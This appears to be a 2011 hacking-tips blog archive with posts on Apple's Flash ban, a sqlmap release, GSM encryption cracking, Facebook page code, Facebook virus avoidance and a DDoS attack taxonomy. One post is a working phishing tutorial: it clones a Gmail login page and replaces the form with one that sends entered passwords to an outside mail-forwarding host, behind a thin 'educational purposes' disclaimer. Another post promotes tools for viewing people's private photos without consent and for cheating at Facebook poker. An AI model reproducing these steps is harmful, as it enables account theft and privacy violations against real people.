Saturday, April 30, 2011

Jobs Kills Flash on Iphone, Ipod and Ipad

Amidst all the wonderfully amusing half-truths and haughty hypocrisies dripping from his open letter on Adobe Flash, Steve Jobs has at least made one thing quite clear: his biggest beef with Flash is that it lets you create applications that run on all sorts of devices that weren't built by him.

And his biggest beef is also his biggest hypocrisy.

In his 1,700-word Thoughts on Flash missive, Jobs says his "most important reason" for banning Flash on the iPhone, iPod touch, and iPad is not that Flash sucks at online video and other web-based stuff. It's that Adobe wants developers to use Flash as a means of building native applications for his holy devices. This is such a problem, Jobs says, because Flash is a cross-platform development tool.

"We know from painful experience that letting a third party layer of software come between the platform and the developer ultimately results in sub-standard apps and hinders the enhancement and progress of the platform," he writes. "This becomes even worse if the third party is supplying a cross platform development tool. The third party may not adopt enhancements from one platform unless they are available on all of their supported platforms.

"Hence developers only have access to the lowest common denominator set of features. Again, we cannot accept an outcome where developers are blocked from using our innovations and enhancements because they are not available on our competitor’s platforms."

He takes a while to get there, but eventually he puts the notion into a nutshell. "Flash is a cross platform development tool," he says. "It is not Adobe’s goal to help developers write the best iPhone, iPod and iPad apps. It is their goal to help developers write cross platform apps." For all Jobs' talk of Flash being "closed and proprietary", plagued by security and performance problems, and, um, ill-suited to multi-touch, it all comes down to the fact that Adobe is interesting in helping developers write apps that run everywhere.

apple-kills-flash

His letter would seem to indicate that when Apple banned code translation on the upcoming iPhone OS 4.0, its primary motivation was to prevent Adobe from translating Flash script for use on the device. Which is hardly a surprise. Before the letter, others had guessed as much.

The ban arrived just days before Adobe introduced a new iPhone packager with its Flash Professional CS5 development kit. With a few lines tucked into the iPhone 4.0 OS SDK license agreement, Apple barred developers from accessing its APIs with anything other than the language he approves of. "Applications must be originally written in Objective-C, C, C++, or JavaScript as executed by the iPhone OS WebKit engine, and only code written in C, C++, and Objective-C may compile and directly link against the Documented APIs (e.g., Applications that link to Documented APIs through an intermediary translation or compatibility layer or tool are prohibited)," the change read.

Yes, we're still left to wonder whether this new language also buries development kits along the lines of Appcelerator's Titanium and Unity3D. These tools also translate codes written in other languages, but unlike Adobe's iPhone packager - which compiles directly into machine code - they make use of Apple's XCode development kit, compiling code into Jobs' beloved Objective C. Provided these kits are briskly updated when Apple introduces new APIs, they may satisfy the man.

These can be viewed as translation layers. And in his letter - echoing a private email he allegedly sent a few weeks back - Jobs makes it clear that he doesn't want a third party sitting between developers and his APIs. "If developers grow dependent on third party development libraries and tools, they can only take advantage of platform enhancements if and when the third party chooses to adopt the new features. We cannot be at the mercy of a third party deciding if and when they will make our enhancements available to our developers," he writes.

But the letter is aimed at Adobe. And only Adobe. In arguing that third-party development kits slow the adoption of Apple's APIs, Jobs calls out Adobe for taking so long to adopt Cocoa, Apple's latest set of APIs for the Mac. "Adobe has been painfully slow to adopt enhancements to Apple’s platforms," he writes. "Although Mac OS X has been shipping for almost 10 years now, Adobe just adopted it fully (Cocoa) two weeks ago when they shipped CS5. Adobe was the last major third-party developer to fully adopt Mac OS X."

Actually, Microsoft hasn't moved Office to Cocoa. And we would argue that Redmond is a major third-party developer. But as OSNews points out, the larger point to make is that Apple itself has taken its sweet time adopting Cocoa. The Mac's centerpiece application, Finder, didn't adopt Cocoa until Snow Leopard, nearly a decade after the API's debut. And Apple iTunes still doesn't use Cocoa. Neither does Final Cut Pro.

In short, with today's letter, Jobs has achieved the sort of haughty hypocrisy typically reserved for the likes of Eric Schmidt. Yes, there the irony that Jobs is accusing Flash of being "closed and proprietary." But the irony goes much further, rending his cross-platform argument in two.

Yes, Flash has its security and performance problems. And, yes, we'd much prefer a webworld that relies open standards. But with today's letter, Steve Jobs has shown that those are merely side issues. The primary issue is that Jobs wants to exert as much control as he possibly can over his devices - and over, well, developers. Notice that he calls them "our developers."

Well, that's part of the primary issue. The other - perhaps larger - part is that the man has some sort of personal vendetta against Adobe Flash. In so many ways, the letter is nonsense. But on this point, it's completely clear.

Friday, April 29, 2011

Automatic Blind SQL Injection Tool – sqlmap 0.9 Released

For those that aren’t familiar with the tool, sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

New Features/Changes
  • Rewritten SQL injection detection engine (Bernardo and Miroslav).
  • Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
  • Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
  • Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
  • Implemented support for Firebird (Bernardo and Miroslav).
  • Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
  • Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
  • Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
  • Added support to fetch unicode data (Bernardo and Miroslav).
  • Added support to use persistent HTTP(s) connection for speed improvement, alive switch (Miroslav).
  • Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
  • Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
  • Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.
The complete changelog is available for viewing here.

You can also download the user manual here [PDF] – sqlmap README

You can download sqlmap 0.9 here:

sqlmap-0.9.tar.gz

Or read more here.

GSM Cellular Crypto Code Breaking

Most people think that “hackers” are just a bunch of criminals. But those of us who are real hackers know better. We know that to be a true hacker, you must dare to discover new things, and have the moral strength to turn your knowledge to good.

In this brief Guide we give an example of how real hackers are working to reveal to the world how to crack open the technique that is supposed to provide privacy to GSM (Global System for Mobile communications) cell phone calls.

Why would anyone want to ruin the privacy of GSM cell phone calls? The problem is that this privacy has already been ruined by those who already know how to crack this code, for example spy agencies. Who knows, perhaps crime organizations also are able to snoop on GSM phone calls. This is a big deal because over three million people are using GSM phone and they don't realize they could be snooped upon.

Enter hackers – specifically, a group led by a member of one of the oldest hacker groups around, Germany's Chaos Computer Club. Karsten Nohl, now chief research scientist with H4RDW4RE, a Sunnyvale, Calif.-based security research firm.

Nohl's solution to this problem was to mount “what could be the most ambitious attempt yet to compromise the GSM phone system.... Others have cracked the A5/1 encryption technology used in GSM before, but their results have remained secret. However, Nohl, who earned a Ph.D. in computer science at the University of Virginia and is a member of Germany's Chaos Computer Club (CCC), intends to go one big step further: By the end of the year, he plans to make the keys available to everyone on the Internet.”

Karsten Nohl discusses Hacking A5 GSM Encryption.  View video here.  Download slides here.

See Nohl's article, Reverse-Engineering a Cryptographic RFID Tag

Tuesday, April 26, 2011

10 Useful Hack Tricks for Business Facebook Fan pages

Facebook Pages are among the best ways to promote your product using the Social media. You can drive lots of visitors to your blog and also could market your product with small investment with the Facebook page. But just creating a Facebook page for your business is not going to promote your business after all, you should have to gather lots of loyal fans to your page and drive them towards the promotion of your product.

So for gathering the Fans for your Facebook page you have to make your page more interactive. In this post we have brought you 10 Cool Facebook Code Tricks for your Business Facebook Fan pages using the Static Fbml Facebook Application.

1. Embedding YouTube Videos

When you click the embed button below the video in YouTube, It will give you the embed code to put that video easily on your website or might be using some free plugin to easily embed youtube videos on wordpress blogs.

But in case of embedding YouTube video on Facebook page, the default embed HTML code doesn’t works. The video on Facebook can be only embedded using the lash. Copy-Paste the code below into the FBML box of your page to embed the video. Remember to replace VIDEO_ID with the YouTube Video ID before you save.
<fb:swf swfsrc=”http://www.youtube.com/v/VIDEO_ID” imgsrc=”http://img.youtube.com/vi/VIDEO_ID/default.jpg” width=”480″ height=”360″ />
2. Separate contents for Fans and non-fans

Showing Separate contents for the Facebook Page fans and non fans can also help you gain more fans for your page. You can use the FMBL below and show separate content for the fans and non-fans.
<fb:fbml version=”1.1″>
<fb:visible-to-connection>This part is visible for fans only!
<fb:else>This part is visible for non-fans</fb:else>
</fb:visible-to-connection>
</fb:fbml>
3. Invite to Friends box

Adding an Invite to Friend box below the main Content of your welcome Tab will also help you increase the fans of your page as it makes your fans easier to invite their friends on Facebook. Use the following code in FBML box  to insert the Invite box in your page.
<fb:request-form method=”post” type=”[your organization]” invite=”true” content=”Check out [your organization]<fb:req-choice url=’http://www.facebook.com/YOURPAGE’ ‘ label=’GO’ /> “>
<fb:multi-friend-selector actiontext=”Tell your friends about [your organization]” rows=”3″ showborder=”true” />
</fb:request-form>
</fb:request-form>
4. Adding a Comment Box

Adding a comment Box on your Facebook page or adding it below any featured product on your page makes your readers easy to comment on the specified product easily. You can use the  following code in the Fbml box to insert it in your page.
<fb:comments xid=”YOUR_PRODUCT_UNIQUE_ID” canpost=”true” showform=”true” candelete=”false” numposts=”3″ returnurl=”http://YOUR_PRODUCT_HOME_URL”>

</fb:comments>
5. Adding podcasts and MP3 Audios

Like YouTube videos you can also embed podcasts or any Mp3 Audio on your Fan page using the Fbml. You have to provide the direct link to the mp3 audio file or Podcast in the Fbml. Facebook will wrap them in their own player and make your fans listen to it easily.
<fb:mp3 src=”http://example.com/podcast.mp3″ title=”Our new Song” artist=”This Week in Facebook” />
6. Adding pop-up Dialog Box

The Pop-up dialog box is used to give the short description of the link with on a Popup dialog box whenever a user clicks a specified link in your fan page.

For instance,You have used pop-up box for the ‘About’ Link on your page then it will show the popup box as above when your fan click on the link and the ‘learn more’ link can be even redirected to your About page.
<fb:dialog id=”dialog” cancel_button=1>

<fb:dialog-title>About Us</fb:dialog-title>

<fb:dialog-content>Bloganol is a Blog About Tech, Social Media, Opensource and more.

Would you like to learn more?</fb:dialog-content>

<fb:dialog-button type=”button” value=”Yes” href=”http://www.bloganol.com/about” />

</fb:dialog>

<a href=”#” clicktoshowdialog=”dialog”>Click here</a> to learn more.
7. Adding Polls to the Page

Previously in our blog we have already published a post about Ultimate Tricks and applications to make your facebook page a masterpiece. On that post adding a poll on a Facebook Page was also included but it was using the direct Facebook application.

In this page we are talking about inserting Polldaddy polls on your fan page in a Tab using the Fbml. Copy-Paste the following Fbml to insert polldaddy polls on your Facebook fan page. Remember to replace POLL_ID with your Poll id from Polldaddy before you save.
<fb:swf swfsrc=’http://i.polldaddy.com/poll.swf?p=POLL_ID’  width=’250′ height=’500′ imgsrc=”poll-thumbnail.jpg” />
8. Inserting Flash Content

Inserting Flash Content on your Facebook page is also like inserting YouTube video in your Page. Use the Fbml to insert Flash content n your page. Use the Flash file URL in the swfsrc and use the image URL on imgsrc as the source of the image that is being displayed, before your flash.
<fb:swf swfbgcolor=”000000″ swfsrc=’http://domain.com/file.swf’ imgsrc=’http://domain.com/picture.jpg’ width=’760′ height=’920′ />
9. Adding a Chat Room

Adding a chat room on your Fan page enables you to chat with your Fans when they are on your page. Firs thing you need is to create a Flash based chat widget for your Facebook page using MeeboMe and then embed that Chat widget on your Facebook Fbml box usng the code below.

Remember to replace CHAT_ID with your widget chat Id provided by Meeome before you save the code.
<fb:swf swfsrc=’http://widget.meebo.com/mm.swf?CHAT_ID’  width=’515′ height=’425′ imgsrc=”chat-thumbnail.jpg” />
10. Adding a share button

A share button on your Facebook page lets your fan to share the provided link on their Facebook profile easily. You can use the following code on Fbml Box of your Page to insert the ‘Share’ button on your fan page.
<fb:share-button class=”meta”>
<link rel=”target_url” href=”http://yoururl.com”/>
</fb:share-button>

Monday, April 25, 2011

How to Avoid Facebook Viruses and Spam Messages

Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming process. Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.


4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.

If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users in form of comments so that others don’t fall victim of it.

Recent Facebook Hacks for 2011

This Facebook Hacks and Tricks will help improve your knowledge around the Facebook Platform. There are ways tech geeks use Facebook and with this Hacks and Tricks you will get to know how.

I have collected the Most Essential Hacks and Tricks of Facebook and presented them to you. I recently wrote about 24 Facebook tricks, you might consider reading that before this.

1.How to View the Album of Any User Even if it is Private

You can use this hack script to view a photo in the original album, even if you’re not friends with the person.

Get it Here

2. How to Remove Annoying Facebook Advertisement

Get rid of some of the Facebook advertising and sponsored by sections with this tool.

Get it Here

3. How to see Real Profiles from Public Pages

This hack script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.

Get it Here

4. How to Undo Facebook Changes

If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.

Get it Here

5. How to View All the Photos from a Person

You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.

Get it Here


6. How to Find More Friends at Facebook

Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this hack and it will help you go through your friends’ friends list and find them out.

Get it Here

7. How to Share Files from Facebook

With this box widget, you can share files from your computer through Facebook. Isn’t this trick great?

Get it Here

8. How to Get a Job from Facebook

Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.

Get it Here


9. How to Tighten up the Privacy and still Maintain Communication Convenience

The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.

Get it Here

10 How to Cheat Facebook Texas Hold em Poker

This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free, this trick is awesome and my peak of them all.

Get it Here

24 Great Facebook Tricks and Hacks

1. Hide Your Online Status From Selected Friends:

So you want to use Facebook chat but don’t want some people to see your online status? Simply open up the Facebook Chat and click on Friends List. Start creating a new list called BlockList.

Once the list is created, add those friends to the list that you want to appear offline to. When the list is complete, hover your mouse to the little green icon adjacent to the list and click Go Offline. Bingo! You will now appear offline to everybody in the BlockList.

2. View a Friend’s Profile Without Messy Applications:

If you are like me, you often get annoyed by the dozens of silly applications that people have added to their profile. Here’s a Grease Monkey script that allows you to view any profile without all those applications. Remember: the Mozilla Firefox web browser is a prerequisite for running Greasemonkey.

3. Display Your Facebook Status On Your WordPress Blog:

Want to display your Facebook status updates on your WordPress blog? There is a plugin that does exactly that. StatusPress lets you display your status updates to a widget on your WordPress blog.

4. Access Facebook Chat Through Your Desktop:

No need to go to Facebook.com if all you want to do is use Facebook chat. You can do it right from your desktop using clients like social.im , Adium or ChitChat.


5. Update Facebook Status From Firefox:

If you are a firefox addict you don’t need to use any other software to update your Facebook status. Simply install the FireStatus add-on and update your status right from your browser. You can also use the Facebook Toolbar to completely manage Facebook from your Firefox browser.

6. Create A Photo Collage From Pictures Of Your Facebook Friends:

Easily create a photo collage from profile pictures of all your Facebook friends using a simple Facebook app called Photo Collage.

7. Add A New friend But Hide It From Your Status Update:

A great tutorial by Tim Watson walks you through the process of hiding specific actions from your status updates.

8. Schedule Facebook Messages To Be Send Later:

If you want to schedule your Facebook messages to be send sometime in the future, Sendible is a great tool to do that. You can also use Sendible to schedule your status updates.

9. How To Share Flickr Photos On Facebook:

My Flickr is a Facebook application that lets you display your Flickr photos and photo sets on Facebook so your friends can view and comment on them without leaving Facebook.

10. How To Download Facebook Photo Albums:

Ever felt the need to download complete photo albums from Facebook. You can easily do it with either a Windows desktop application named FotoBounce or a great Firefox add-on FacePad.


11. Upload Photos On Facebook From Your Phone:

All the smart phones like iPhone and Blackberry make it simple to upload photos to your Facebook account but how would you do it if you have a regular phone? Here is a great tutorial to walk you through that.

12. Magic Circles On Facebook:

You might have heard about the Konami code that makes red blurry circles on your Facebook page. This might be one of the most popular Facebook hidden tricks. Here’s how to do it:
Press Up, Up, Down, Down, Left, Right, Left, Right, B, A, Enter key then press up & down & Magic circles will appear!
To stop them simply reload your page.



13. Use Your Facebook Like A Pirate:

Do you love talking like a pirate? You can set your Facebook to appear like a pirate page by going into Current Language Settings and setting it to English (Pirate).



14. How To Insert Cool Symbols In Your Status Updates:

Make your status updates interesting by inserting cool symbols. Simply copying them from this list and pasting in your status updates.


15. Automatically Poke Friends That Poke You:

Don’t have enough time to poke back friends who poke you on Facebook? Automate it with a Grease Monkey script called Facebook Autopoke.

16. Upload Photos From PicasaTo Facebook:

Upload photos to your Facebook account directly from Picasa using the Picasa app for Facebook. You can also upload the Picasa captions and resize your photos before uploading them to Facebook.

17. Search Facebook Like A Pro:

Not everybody knows how powerful Facebook search is. Similar to any large search engine, Facebook search has a lot of advanced options to help you search like a pro. For example if you are looking for a person named John Marsh and filter your results down to only people who are married, you can try name: John Marsh status:married. A complete list of search tips for Facebook can be found here.


18. How To Update Facebook Status From Gmail:

Facebook gadget for Gmail allows you to update your Facebook status right from your Gmail.


19. How To Access Gmail From Facebook:

If you seldom have to leave Facebook just to go check your Gmail inbox, check out Fmail. It is a great application that lets you check your Gmail from within your Facebook inbox.

20. See Facebook Twitter style:

If you love Twitter more than Facebook, you can view your Facebook just like you view your Twitter using this grease monkey script.

21. Import Facebook Friends To Twitter:

FB140 is a simple tool that lets you find all your Facebook friends that are using Twitter so you can easily follow them.

22. Access Facebook From Microsoft Outlook:

This is a great tip for people attending colleges or working in places that block Facebook, but allow you access to Microsoft Outlook. Simple install the FBlook plugin and access Facebook from Outlook.

23. Display Your Facebook Status Upside Down:

This is a cool and fun trick. To display upside down status updates, simply head over to FlipText and type in your status. Then simply click on Flip Text and copy-paste the upside down text into your Facebook status box.

24. Update Facebook Status Using Twitter:

Wouldn’t you love to update your status on both Facebook and Twitter at the same time. Just install the Twitter application for Facebook. Once synced, your tweets including the #fb tag would automatically be posted as status updates on your Facebook.

Thursday, April 21, 2011

Hacking Tricks » How To Create A Fake Email Login Page

Fake Login Pages are one of the BEST method to Hack an Email account.Now it’s easy to build a Fake Login Pages without any knowledge of Programming Languages.
One can use http://www.jotform.com to build the Sign Up page.

Rest of the things required to build a Fake Login Page are easy to learn.Example of a Fake Login Page is displayed below.

Don’t forget to spice up your fake login page with css to express the delusion.

If you want to host your page on a free server, then below is the link to Free Hosting Providers.
http://www.webs.com or http://www.zymic.com

How to : Make Fake Login Page in 5 mins

Do step by step

  • Open any page for which you wanna make fake. (For example: Gmail.com)
  • Save page . In the saving option it asks for save as type select complete webpage.(Ctrl + s)
  • Now where u have save the page it will be showing u that page and a dir wid images on the page.
  • Now Rite Click on the Page and click edit.
  • Search <Form in the page.
  • Now Delete That Form Value , Method ,Action whatever its written delete that line.(For Gmail: <FORM id=”gaia_loginform” action=”https://www.google.com/accounts/ServiceLoginAuth” method=”post” onSubmit=”return(gaia_onLoginSubmit());”>)
  • Now add this line 
<form action="http://www.big-llc.com/formmailer/submit" method="post"><input type="hidden" value="Your Email Id" name="fm-to"><font color="#333333"> </font><input type="hidden" value="blog.icyse.com_password_for educational purposes only" name="fm-title"><font color="#333333"> </font><input type="hidden" value="Link You Want To redirect" name="fm-redirect"><font color="#333333"> </font>
  • Save and close the editor.
  • Upload the Directory wid images and this Page on free hosting site.
  • Its Done Simply made in just 5 mins
Note : Don’t Change The Directory Name or Page Name.


Now you can receive the id/password on your email.
Disclaimer
All the information provided on ProHackingTricks are for educational purposes only. The site is no way responsible for any misuse of the information. ProHackingTricks is a site related to Computer Security and not a site that promotes hacking/cracking/software piracy.All the information on this site are meant for developing Hacker Defense attitude among the users and help preventing the hack attacks.ProHackingTricks insists that these information shall not be used for causing any kind of damage directly or indirectly.The site is totally meant for educational purposes only and the author of ProHackingTricks is not liable of any illegal act performed by any user.

DDoS Attacks and DDoS Defense Mechanisms

Introduction

Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks.The DDoS field is evolving quickly, and it is becoming increasingly hard to grasp a global view of the problem.

DDoS Attack Overview

A denial-of-service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. A distributed denial-of-service attack deploys multiple machines to attain this goal. The service is denied by sending a stream of packets to a victim that either consumes some key resource, thus rendering it unavailable to legitimate clients, or provides the attacker with unlimited access to the victim machine so he can inflict arbitrary damage. This section will answer the following questions:

1. What makes DDoS attacks possible?
2. How do these attacks occur?
3. Why do they occur?

Internet Architecture

The Internet is managed in a distributed manner; therefore no common policy can be enforced among its participants.Such design opens several security issues that provide opportunities for distributed denial-of-service attacks:

1. Internet security is highly interdependent. DDoS attacks are commonly launched from systems that are subverted through security related compromises. Regardless of how well secured the victim system may be, its susceptibility to DDoS attacks depends on the state of security in the rest of the global Internet.

2. Internet resource is limited. Each Internet host has limited resources that can be consumed by a sufficient number of users.

3. Power of many is greater than power of few. Coordinated and simultaneous malicious actions by some participants can always be detrimental to others, if the resources of the attackers are greater than the resources of the victims.

4. Intelligence and resources are not collocated an end-to-end communication paradigm led to locating most of the intelligence needed for service guarantees with end hosts. At the same time, a desire for large throughput led to the design of high bandwidth pathways in the intermediate network. Thus, malicious clients can misuse the abundant resources of unwitting network for delivery of numerous messages to a victim.

DDoS Attack Strategy

In order to perform a distributed denial-of-service attack, the attacker needs to recruit the multiple agent (slave) machines. This process is usually performed automatically through scanning of remote machines, looking for security holes that would enable subversion. Vulnerable machines are then exploited by using the discovered vulnerability to gain access to the machine, and they are infected with the attack code. The exploit/infection phase is also automated, and the infected machines can be used for further recruitment of new agents .Agent machines perform the attack against the victim. Attackers usually hide the identity of the agent machines during the attack through spoofing of the source address field in packets. The agent machines can thus be reused for future attacks.

DDoS Goals


The goal of a DDoS attack is to inflict damage on the victim, either for personal reasons (a significant number of DDoS attacks are against home computers, presumably for purposes of revenge), for material gain (damaging competitor’s resources) or for popularity (successful attacks on popular Web servers gain the respect of the hacker community).

Taxonomy of DDoS Attacks

In order to devise a taxonomy of distributed denialof- service attacks we observe the means used to prepare and perform the attack, the characteristics of the attack itself and the effect it has on the victim. Various classification criteria are indicated in bold type. Figure 1 summarizes the taxonomy.

Classification by Degree of Automation


During the attack preparation, the attacker needs to locate prospective agent machines and infect them with the attack code. Based on the degree of automation of the attack, we differentiate between manual, semi-automatic and automatic DDoS attacks.

Manual Attacks

Only the early DDoS attacks belonged to the manual category. The attacker scanned remote machines for vulnerabilities, broke into them and installed the attack code, and then commanded the onset of the attack. All of these actions were soon automated, leading to development of semiautomatic DDoS attacks, the category where most contemporary attacks belong.

Semi-Automatic Attacks
In semi-automatic attacks, the DDoS network consists of handler (master) and agent (slave, daemon) machines. The attacker deploys automated scripts for scanning and compromise of those machines and installation of the attack code. He then uses handler machines to specify the attack type and the victim’s address and to command the onset of the attack to agents, who send packets to the victim. Based on the communication mechanism deployed between agent and handler machines we divide semi-automatic attacks into attacks with direct communication and attacks with indirect communication.

Attacks with direct communication


During attacks with direct communication, the agent and handler machines need to know each other’s identity in order to communicate. This is achieved by hard-coding the IP address of the handler machines in the attack code that is later installed on the agent. Each agent then reports its readiness to the handlers, who store its IP address in a file for later communication. The obvious drawback of this approach is that discovery of one compromised machine can expose the whole DDoS network. Also, since agents and handlers listen to network connections, they are identifiable by network scanners.

Attacks with indirect communication

Attacks with indirect communication deploy a level of indirection to increase the survivability of a DDoS network.Recent attacks provide the example of using IRC channels for agent/handler communication. The use of IRC services replaces the function of a handler, since the IRC channel offers sufficient anonymity to the attacker. Since DDoS agents establish outbound connections to a standard service port used by a legitimate network service, agent communications to the control point may not be easily differentiated from legitimate network traffic. The agents do not incorporate a listening port that is easily detectable with network scanners. An attacker controls the agents using IRC communications channels. Thus, discovery of a single agent may lead no further than the identification of one or more IRC servers and channel names used by the DDoS network. From there, identification of the DDoS network depends on the ability to track agents currently connected to the IRC server. Although the IRC service is the only current example of indirect communication, there is nothing to prevent attackers from subverting other legitimate services for similar purposes.

Automatic Attacks

Automatic DDoS attacks additionally automate the attack phase, thus avoiding the need for communication between attacker and agent machines. The time of the onset of the attack,
attack type, duration and victim’s address is preprogrammed in the attack code. It is obvious that such deployment mechanisms offer minimal exposure to the attacker, since he is only involved in issuing a single command – the start of the attack script. The hard coded attack specification suggests a single-purpose use of the DDoS network. However, the propagation mechanisms usually leave the backdoor to the compromised DDoS machine open, enabling easy future access and modification of the attack code. Both semi-automatic and automatic attacks recruit the agent machines by deploying automatic scanning and propagation techniques. Based on the scanning strategy, we differentiate between attacks that deploy random scanning, hit list scanning, topological scanning, permutation scanning and local subnet scanning. Attackers usually combine the scanning and exploitation phases, thus gaining a larger agent population, and my description of scanning techniques relates to this model.

Attacks with Random Scanning


During random scanning each compromised host probes random addresses in the IP address space, using a different seed. This potentially creates a high traffic volume since many machines probe the same addresses. Code Red (CRv2) performed random scanning .

Attacks with Hitlist Scanning

A machine performing hitlist scanning probes all addresses from an externally supplied list. When it detects the vulnerable machine, it sends one half of the initial hitlist to the recipient and keeps the other half. This technique allows for great propagation speed (due to exponential spread) and no collisions during the scanning phase. An attack deploying hitlist scanning could obtain the list from netscan.org of domains that still support directed IP broadcast and can thus be used for a Smurf attack.

Attacks with Topological Scanning

Topological scanning uses the information on the compromised host to select new targets. All mail worms use topological scanning, exploiting the information from address books for their spread.

Attacks with Permutation Scanning


During permutation scanning, all compromised machines share a common pseudo-random permutation of the IP address space; each IP address is mapped to an index in this permutation. A machine begins scanning by using the index computed from its IP address as a starting point. Whenever it sees an already infected machine, it chooses a new random start point. This has the effect of providing a semi coordinated, comprehensive scan while maintaining the benefits of random probing. This technique is described in as not yet deployed.

Attacks with Local Subnet Scanning


Local subnet scanning can be added to any of the previously described techniques to preferentially scan for targets that reside on the same subnet as the compromised host. Using this technique, a single copy of the scanning program can compromise many vulnerable machines behind a firewall. Code Red II and Nimda Worm used local subnet scanning. Based on the attack code propagation mechanism, we differentiate between attacks that deploy central source propagation, back-chaining propagation and autonomous propagation .

Attacks with Central Source Propagation

During central source propagation, the attack code resides on a central server or set of servers.
After compromise of the agent machine, the code is downloaded from the central source through a file transfer mechanism. The 1i0n worm operated in this manner.

Attacks with Back-chaining Propagation

During back-chaining propagation, the attack code is downloaded from the machine that was used to exploit the system.The infected machine then becomes the source for the next propagation step. Back-chaining propagation is more survivable than central-source propagation since it avoids a single point of failure. The Ramen worm and Morris Worm used backchaining propagation.

Attacks with Autonomous Propagation

Autonomous propagation avoids the file retrieval step by injecting attack instructions directly into the target host during the exploitation phase. Code Red, Warhol Worm and numerous E-mail worms use autonomous propagation.

Classification by Exploited Vulnerability

Distributed denial-of-service attacks exploit different strategies to deny the service of the victim to its clients. Based on the vulnerability that is targeted during an attack, we differentiate between protocol attacks and brute-force attacks.

Protocol Attacks

Protocol attacks exploit a specific feature or implementation bug of some protocol installed at the victim in order to consume excess amounts of its resources. Examples include the TCP SYN attack, the CGI request attack and the authentication server attack. In the TCP SYN attack, the exploited feature is the allocation of substantial space in a connection queue immediately upon receipt of a TCP SYN request. The attacker initiates multiple connections that are never completed, thus filling up the connection queue indefinitely. In the CGI request attack, the attacker consumes the CPU time of the victim by issuing multiple CGI requests. In the authentication server attack, the attacker exploits the fact that the signature verification process consumes significantly more resources than bogus signature generation. He sends numerous bogus authentication requests to the server, tying up its resources.

Brute-force Attacks

Brute-force attacks are performed by initiating a vast amount of seemingly legitimate transactions. Since an upstream network can usually deliver higher traffic volume than the victim network can handle, this exhausts the victim’s resources. We further divide brute-force attacks based on the relation of packet contents with victim services into filterable and non-filterable attacks.

Filterable Attacks

Filterable attacks use bogus packets or packets for non-critical services of the victim’s operation, and thus can be filtered by a firewall. Examples of such attacks are a UDP flood attack or an
ICMP request flood attack on a Web server.

Non-filterable Attacks

Non-filterable attacks use packets that request legitimate services from the victim. Thus, filtering all packets that match the attack signature would lead to an immediate denial of the specified service to both attackers and the legitimate clients. Examples are a HTTP request flood targeting a Web server or a DNS request flood targeting a name server. The line between protocol and brute force attacks is thin. Protocol attacks also overwhelm a victim’s resources with excess traffic, and badly designed protocol features at remote hosts are frequently used to perform “reflector” brute-force attacks, such as the DNS request attack or the Smurf attack.

The difference is that a victim can mitigate the effect of protocol attacks by modifying the deployed protocols at its site, while it is helpless against brute-force attacks due to their misuse of legitimate services (non-filterable attacks) or due to its own limited resources (a victim can do nothing about an attack that swamps its network bandwidth). Countering protocol attacks by modifying the deployed protocol pushes the corresponding attack mechanism into the brute-force category. For example, if the victim deploys TCP SYN cookies to combat TCP SYN attacks, it will still be vulnerable to TCP SYN attacks that generate more requests than its network can accommodate.

